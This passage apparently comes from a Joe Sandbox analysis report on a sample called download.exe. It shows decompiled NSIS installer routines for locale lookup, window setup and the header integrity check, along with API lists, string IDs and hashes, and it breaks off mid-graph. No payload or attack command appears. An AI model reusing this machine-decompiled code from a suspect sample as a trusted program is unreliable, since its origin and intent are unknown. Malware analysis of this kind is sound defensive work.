                                                      control_flow_graph 185 4037ab-4037c3 call 406315 188 4037c5-4037d0 GetUserDefaultUILanguage call 405edb 185->188 189 4037d7-403808 call 405e64 185->189 192 4037d5 188->192 195 403820-403826 lstrcatA 189->195 196 40380a-40381b call 405e64 189->196 194 40382b-403854 call 403a70 call 405a03 192->194 202 40385a-40385f 194->202 203 4038db-4038e3 call 405a03 194->203 195->194 196->195 202->203 204 403861-403885 call 405e64 202->204 209 4038f1-403916 LoadImageA 203->209 210 4038e5-4038ec call 405f9f 203->210 204->203 211 403887-403889 204->211 213 403997-40399f call 40140b 209->213 214 403918-403948 RegisterClassA 209->214 210->209 215 40389a-4038a6 lstrlenA 211->215 216 40388b-403898 call 405940 211->216 228 4039a1-4039a4 213->228 229 4039a9-4039b4 call 403a70 213->229 217 403a66 214->217 218 40394e-403992 SystemParametersInfoA CreateWindowExA 214->218 222 4038a8-4038b6 lstrcmpiA 215->222 223 4038ce-4038d6 call 405915 call 405f7d 215->223 216->215 221 403a68-403a6f 217->221 218->213 222->223 227 4038b8-4038c2 GetFileAttributesA 222->227 223->203 232 4038c4-4038c6 227->232 233 4038c8-4038c9 call 40595c 227->233 228->221 237 4039ba-4039d4 ShowWindow call 4062a7 229->237 238 403a3d-403a3e call 405176 229->238 232->223 232->233 233->223 245 4039e0-4039f2 GetClassInfoA 237->245 246 4039d6-4039db call 4062a7 237->246 241 403a43-403a45 238->241 243 403a47-403a4d 241->243 244 403a5f-403a61 call 40140b 241->244 243->228 247 403a53-403a5a call 40140b 243->247 244->217 250 4039f4-403a04 GetClassInfoA RegisterClassA 245->250 251 403a0a-403a2d DialogBoxParamA call 40140b 245->251 246->245 247->228 250->251 255 403a32-403a3b call 4036fb 251->255 255->221
                                                      C-Code - Quality: 96%
                                                      			E004037AB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				signed int _t21;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				intOrPtr _t55;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				struct HINSTANCE__* _t71;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x7a2f54; // 0xae4de0
				_t17 = E00406315(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x79f540;
					"1033" = 0x30;
					 *0x7aa001 = 0x78;
					 *0x7aa002 = 0;
					E00405E64(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f540, 0);
					__eflags =  *0x79f540;
					if(__eflags == 0) {
						E00405E64(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M00408362, 0x79f540, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00405EDB("1033", _t67 & 0x0000ffff);
				}
				E00403A70(_t71, _t84);
				_t21 =  *0x7a2f5c; // 0x80
				_t80 = "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize";
				 *0x7a2fe0 = _t21 & 0x00000020;
				 *0x7a2ffc = 0x10000;
				if(E00405A03(_t84, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize") != 0) {
					L16:
					if(E00405A03(_t92, _t80) == 0) {
						_t8 = _t76 + 0x118; // 0x4a
						E00405F9F(0, _t74, _t76, _t80,  *_t8); // executed
					}
					_t25 = LoadImageA( *0x7a2f40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a2728 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403A70(_t71, __eflags);
							__eflags =  *0x7a3000;
							if( *0x7a3000 != 0) {
								_t28 = E00405176(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a270c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x79f520, 5); // executed
							_t34 = E004062A7("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004062A7("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x7a26e0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x7a26e0);
								 *0x7a2704 = _t81;
								RegisterClassA(0x7a26e0);
							}
							_t36 =  *0x7a2720; // 0x0
							_t39 = DialogBoxParamA( *0x7a2f40, _t36 + 0x00000069 & 0x0000ffff, 0, E00403B48, 0); // executed
							E004036FB(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x7a2f40; // 0x400000
						 *0x7a26e4 = E00401000;
						 *0x7a26f0 = _t71;
						 *0x7a26f4 = _t25;
						 *0x7a2704 = 0x40a1f4;
						if(RegisterClassA(0x7a26e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x79f520 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f40, 0);
						goto L21;
					}
				} else {
					_t1 = _t76 + 0x48; // 0x0
					_t71 =  *_t1;
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t2 = _t76 + 0x4c; // 0x0
					_t55 =  *0x7a2f98; // 0xae8c88
					_t74 = 0x7a1ee0;
					_t71 = _t71 + _t55;
					_t3 = _t76 + 0x44; // 0x0
					E00405E64(_t71, _t86,  *_t3, _t71,  *_t2 + _t55, 0x7a1ee0, 0);
					_t57 =  *0x7a1ee0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x7a1ee1;
						 *((char*)(E00405940(0x7a1ee1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405F7D(_t80, E00405915(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E0040595C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                      0x004037b1
                                                      0x004037ba
                                                      0x004037c1
                                                      0x004037c3
                                                      0x004037d7
                                                      0x004037e9
                                                      0x004037f0
                                                      0x004037f7
                                                      0x004037fd
                                                      0x00403802
                                                      0x00403808
                                                      0x0040381b
                                                      0x0040381b
                                                      0x00403826
                                                      0x004037c5
                                                      0x004037c5
                                                      0x004037d0
                                                      0x004037d0
                                                      0x0040382b
                                                      0x00403830
                                                      0x00403835
                                                      0x0040383e
                                                      0x00403843
                                                      0x00403854
                                                      0x004038db
                                                      0x004038e3
                                                      0x004038e5
                                                      0x004038ec
                                                      0x004038ec
                                                      0x00403902
                                                      0x00403908
                                                      0x00403916
                                                      0x00403997
                                                      0x0040399f
                                                      0x004039a9
                                                      0x004039ae
                                                      0x004039b4
                                                      0x00403a3e
                                                      0x00403a43
                                                      0x00403a45
                                                      0x00403a61
                                                      0x00000000
                                                      0x00403a61
                                                      0x00403a47
                                                      0x00403a4d
                                                      0x00403a55
                                                      0x00403a55
                                                      0x00000000
                                                      0x00403a4d
                                                      0x004039c2
                                                      0x004039cd
                                                      0x004039d2
                                                      0x004039d4
                                                      0x004039db
                                                      0x004039db
                                                      0x004039e6
                                                      0x004039ee
                                                      0x004039f0
                                                      0x004039f2
                                                      0x004039fb
                                                      0x004039fe
                                                      0x00403a04
                                                      0x00403a04
                                                      0x00403a0a
                                                      0x00403a23
                                                      0x00403a34
                                                      0x00000000
                                                      0x00403a39
                                                      0x004039a1
                                                      0x004039a3
                                                      0x00000000
                                                      0x00403918
                                                      0x00403918
                                                      0x00403924
                                                      0x0040392e
                                                      0x00403934
                                                      0x00403939
                                                      0x00403948
                                                      0x00403a66
                                                      0x00403a66
                                                      0x00000000
                                                      0x00403a66
                                                      0x00403957
                                                      0x00403992
                                                      0x00000000
                                                      0x00403992
                                                      0x0040385a
                                                      0x0040385a
                                                      0x0040385a
                                                      0x0040385d
                                                      0x0040385f
                                                      0x00000000
                                                      0x00000000
                                                      0x00403861
                                                      0x00403864
                                                      0x00403869
                                                      0x00403872
                                                      0x00403876
                                                      0x00403879
                                                      0x0040387e
                                                      0x00403885
                                                      0x00000000
                                                      0x00000000
                                                      0x00403889
                                                      0x0040388b
                                                      0x00403898
                                                      0x00403898
                                                      0x004038a0
                                                      0x004038a6
                                                      0x004038ce
                                                      0x004038d6
                                                      0x00000000
                                                      0x004038b8
                                                      0x004038b9
                                                      0x004038c2
                                                      0x004038c8
                                                      0x004038c9
                                                      0x00000000
                                                      0x004038c9
                                                      0x004038c4
                                                      0x004038c6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004038c6
                                                      0x004038a6

                                                      APIs
                                                        • Part of subcall function 00406315: GetModuleHandleA.KERNEL32(?,?,?,0040325C,0000000A), ref: 00406327
                                                        • Part of subcall function 00406315: GetProcAddress.KERNEL32(00000000,?), ref: 00406342
                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,75A63410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\download.exe",00000000), ref: 004037C5
                                                        • Part of subcall function 00405EDB: wsprintfA.USER32 ref: 00405EE8
                                                      • lstrcatA.KERNEL32(1033,0079F540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F540,00000000,00000002,75A63410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\download.exe",00000000), ref: 00403826
                                                      • lstrlenA.KERNEL32(Call,00000000,00000000,00000000,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize,1033,0079F540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F540,00000000,00000002,75A63410), ref: 0040389B
                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 004038AE
                                                      • GetFileAttributesA.KERNEL32(Call), ref: 004038B9
                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize), ref: 00403902
                                                      • RegisterClassA.USER32(007A26E0), ref: 0040393F
                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403957
                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040398C
                                                      • ShowWindow.USER32(00000005,00000000), ref: 004039C2
                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 004039EE
                                                      • GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 004039FB
                                                      • RegisterClassA.USER32(007A26E0), ref: 00403A04
                                                      • DialogBoxParamA.USER32(?,00000000,00403B48,00000000), ref: 00403A23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\Desktop\download.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
                                                      • API String ID: 606308-2825270492
                                                      • Opcode ID: 7c17711a53f5d675b216d633321a2e6c9060460c0893605bcdabe41a28e1cda8
                                                      • Instruction ID: dff23d5ef8b44838d5d7b4120faab130ca8a02140368ea181f7986d44215ec0e
                                                      • Opcode Fuzzy Hash: 7c17711a53f5d675b216d633321a2e6c9060460c0893605bcdabe41a28e1cda8
                                                      • Instruction Fuzzy Hash: 4661B571240600BED610AF659D45F3B3AACDB85749F00857FF981B62E2DB7D9D028B2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402D63 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 363 402d63-402db1 GetTickCount GetModuleFileNameA call 405b16 366 402db3-402db8 363->366 367 402dbd-402deb call 405f7d call 40595c call 405f7d GetFileSize 363->367 368 402f95-402f99 366->368 375 402df1 367->375 376 402ed8-402ee6 call 402cff 367->376 378 402df6-402e0d 375->378 382 402ee8-402eeb 376->382 383 402f3b-402f40 376->383 380 402e11-402e1a call 40318b 378->380 381 402e0f 378->381 389 402e20-402e27 380->389 390 402f42-402f4a call 402cff 380->390 381->380 385 402eed-402f05 call 4031a1 call 40318b 382->385 386 402f0f-402f39 GlobalAlloc call 4031a1 call 402f9c 382->386 383->368 385->383 411 402f07-402f0d 385->411 386->383 409 402f4c-402f5d 386->409 394 402ea3-402ea7 389->394 395 402e29-402e3d call 405ad1 389->395 390->383 399 402eb1-402eb7 394->399 400 402ea9-402eb0 call 402cff 394->400 395->399 414 402e3f-402e46 395->414 406 402ec6-402ed0 399->406 407 402eb9-402ec3 call 4063cc 399->407 400->399 406->378 410 402ed6 406->410 407->406 416 402f65-402f6a 409->416 417 402f5f 409->417 410->376 411->383 411->386 414->399 415 402e48-402e4f 414->415 415->399 419 402e51-402e58 415->419 420 402f6b-402f71 416->420 417->416 419->399 421 402e5a-402e61 419->421 420->420 422 402f73-402f8e SetFilePointer call 405ad1 420->422 421->399 423 402e63-402e83 421->423 426 402f93 422->426 423->383 425 402e89-402e8d 423->425 427 402e95-402e9d 425->427 428 402e8f-402e93 425->428 426->368 427->399 429 402e9f-402ea1 427->429 428->410 428->427 429->399
                                                      C-Code - Quality: 80%
                                                      			E00402D63(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\Arthur\\Desktop\\download.exe";
				 *0x7a2f50 = _t43 + 0x3e8; // executed
				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\download.exe", 0x400); // executed
				_t89 = E00405B16(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\Arthur\\Desktop";
				E00405F7D("C:\\Users\\Arthur\\Desktop", _t91);
				E00405F7D(0x7ab000, E0040595C(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7960fc = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402CFF(1);
					__eflags =  *0x7a2f58 - _t82; // 0x3fc00
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x7a2f58; // 0x3fc00
						E004031A1(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402F9C(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7a2f54 = _t94;
							 *0x7a2f5c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a2f60 =  *0x7a2f60 + 1;
								__eflags =  *0x7a2f60;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405AD1(0x7a2f80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004031A1( *0x78a0f4);
					_t65 = E0040318B( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x7a2f58; // 0x3fc00
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040318B(0x796100, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402CFF(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7a2f58;
						if( *0x7a2f58 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402CFF(0);
							}
							goto L20;
						}
						E00405AD1( &_v44, 0x796100, "true");
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x78a0f4; // 0xa4d3a
						 *0x7a3000 =  *0x7a3000 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7a2f58 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7960fc; // 0xa6270
						if(__eflags < 0) {
							_v12 = E004063CC(_v12, 0x796100, _t90);
						}
						 *0x78a0f4 =  *0x78a0f4 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                      0x00402d6b
                                                      0x00402d6e
                                                      0x00402d71
                                                      0x00402d74
                                                      0x00402d7a
                                                      0x00402d8b
                                                      0x00402d90
                                                      0x00402da3
                                                      0x00402da8
                                                      0x00402dab
                                                      0x00402db1
                                                      0x00000000
                                                      0x00402db3
                                                      0x00402dbe
                                                      0x00402dc4
                                                      0x00402dd5
                                                      0x00402ddc
                                                      0x00402de2
                                                      0x00402de4
                                                      0x00402de9
                                                      0x00402deb
                                                      0x00402ed8
                                                      0x00402eda
                                                      0x00402edf
                                                      0x00402ee6
                                                      0x00000000
                                                      0x00000000
                                                      0x00402ee8
                                                      0x00402eeb
                                                      0x00402f0f
                                                      0x00402f14
                                                      0x00402f1a
                                                      0x00402f1c
                                                      0x00402f25
                                                      0x00402f2a
                                                      0x00402f2d
                                                      0x00402f2e
                                                      0x00402f2f
                                                      0x00402f31
                                                      0x00402f36
                                                      0x00402f39
                                                      0x00402f4c
                                                      0x00402f50
                                                      0x00402f58
                                                      0x00402f5d
                                                      0x00402f5f
                                                      0x00402f5f
                                                      0x00402f5f
                                                      0x00402f67
                                                      0x00402f67
                                                      0x00402f6a
                                                      0x00402f6b
                                                      0x00402f6b
                                                      0x00402f6e
                                                      0x00402f70
                                                      0x00402f70
                                                      0x00402f70
                                                      0x00402f7a
                                                      0x00402f80
                                                      0x00402f8e
                                                      0x00402f93
                                                      0x00000000
                                                      0x00402f93
                                                      0x00000000
                                                      0x00402f39
                                                      0x00402ef3
                                                      0x00402efe
                                                      0x00402f03
                                                      0x00402f05
                                                      0x00000000
                                                      0x00000000
                                                      0x00402f0a
                                                      0x00402f0d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402df1
                                                      0x00402df6
                                                      0x00402df6
                                                      0x00402dfb
                                                      0x00402dff
                                                      0x00402e06
                                                      0x00402e0b
                                                      0x00402e0d
                                                      0x00402e0f
                                                      0x00402e0f
                                                      0x00402e13
                                                      0x00402e18
                                                      0x00402e1a
                                                      0x00402f44
                                                      0x00402f3b
                                                      0x00000000
                                                      0x00402f3b
                                                      0x00402e20
                                                      0x00402e27
                                                      0x00402ea3
                                                      0x00402ea7
                                                      0x00402eab
                                                      0x00402eb0
                                                      0x00000000
                                                      0x00402ea7
                                                      0x00402e30
                                                      0x00402e35
                                                      0x00402e38
                                                      0x00402e3d
                                                      0x00000000
                                                      0x00000000
                                                      0x00402e3f
                                                      0x00402e46
                                                      0x00000000
                                                      0x00000000
                                                      0x00402e48
                                                      0x00402e4f
                                                      0x00000000
                                                      0x00000000
                                                      0x00402e51
                                                      0x00402e58
                                                      0x00000000
                                                      0x00000000
                                                      0x00402e5a
                                                      0x00402e61
                                                      0x00000000
                                                      0x00000000
                                                      0x00402e63
                                                      0x00402e69
                                                      0x00402e72
                                                      0x00402e78
                                                      0x00402e7b
                                                      0x00402e7d
                                                      0x00402e83
                                                      0x00000000
                                                      0x00000000
                                                      0x00402e89
                                                      0x00402e8d
                                                      0x00402e95
                                                      0x00402e95
                                                      0x00402e98
                                                      0x00402e98
                                                      0x00402e9b
                                                      0x00402e9d
                                                      0x00402e9f
                                                      0x00402e9f
                                                      0x00000000
                                                      0x00402e9d
                                                      0x00402e8f
                                                      0x00402e93
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402eb1
                                                      0x00402eb1
                                                      0x00402eb7
                                                      0x00402ec3
                                                      0x00402ec3
                                                      0x00402ec6
                                                      0x00402ecc
                                                      0x00402ece
                                                      0x00402ece
                                                      0x00402ed6
                                                      0x00402ed6
                                                      0x00000000
                                                      0x00402ed6

                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00402D74
                                                      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\download.exe,00000400), ref: 00402D90
                                                        • Part of subcall function 00405B16: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00405B1A
                                                        • Part of subcall function 00405B16: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B3C
                                                      • GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\download.exe,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00402DDC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                      • String ID: "C:\Users\user\Desktop\download.exe"$:M$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\download.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$pb$soft
                                                      • API String ID: 4283519449-2933133286
                                                      • Opcode ID: c070d1a6a1e642fc9781c75ed052fb1a39172e96787f639e7ba8b58f5885ef14
                                                      • Instruction ID: e7e10bf14dd6c84c423c7e0fea7576ec82b222124ef8da9379000f3ec2b80706
                                                      • Opcode Fuzzy Hash: c070d1a6a1e642fc9781c75ed052fb1a39172e96787f639e7ba8b58f5885ef14
                                                      • Instruction Fuzzy Hash: 7151D371940215AFDB119F64DE89A5F7BB8EB04368F10413BF904B62D1D7BC8E818B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405F9F Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 430 405f9f-405faa 431 405fac-405fbb 430->431 432 405fbd-405fd3 430->432 431->432 433 4061c4-4061c8 432->433 434 405fd9-405fe4 432->434 435 405ff6-406000 433->435 436 4061ce-4061d8 433->436 434->433 437 405fea-405ff1 434->437 435->436 440 406006-40600d 435->440 438 4061e3-4061e4 436->438 439 4061da-4061de call 405f7d 436->439 437->433 439->438 442 406013-406047 440->442 443 4061b7 440->443 444 406164-406167 442->444 445 40604d-406057 442->445 446 4061c1-4061c3 443->446 447 4061b9-4061bf 443->447 450 406197-40619a 444->450 451 406169-40616c 444->451 448 406071 445->448 449 406059-40605d 445->449 446->433 447->433 455 406078-40607f 448->455 449->448 452 40605f-406063 449->452 456 4061a8-4061b5 lstrlenA 450->456 457 40619c-4061a3 call 405f9f 450->457 453 40617c-406188 call 405f7d 451->453 454 40616e-40617a call 405edb 451->454 452->448 458 406065-406069 452->458 468 40618d-406193 453->468 454->468 460 406081-406083 455->460 461 406084-406086 455->461 456->433 457->456 458->448 464 40606b-40606f 458->464 460->461 466 406088-4060a3 call 405e64 461->466 467 4060bf-4060c2 461->467 464->455 476 4060a8-4060ab 466->476 471 4060d2-4060d5 467->471 472 4060c4-4060d0 GetSystemDirectoryA 467->472 468->456 470 406195 468->470 477 40615c-406162 call 4061e7 470->477 474 406142-406144 471->474 475 4060d7-4060e5 GetWindowsDirectoryA 471->475 473 406146-406149 472->473 473->477 480 40614b-40614f 473->480 474->473 478 4060e7-4060f1 474->478 475->474 479 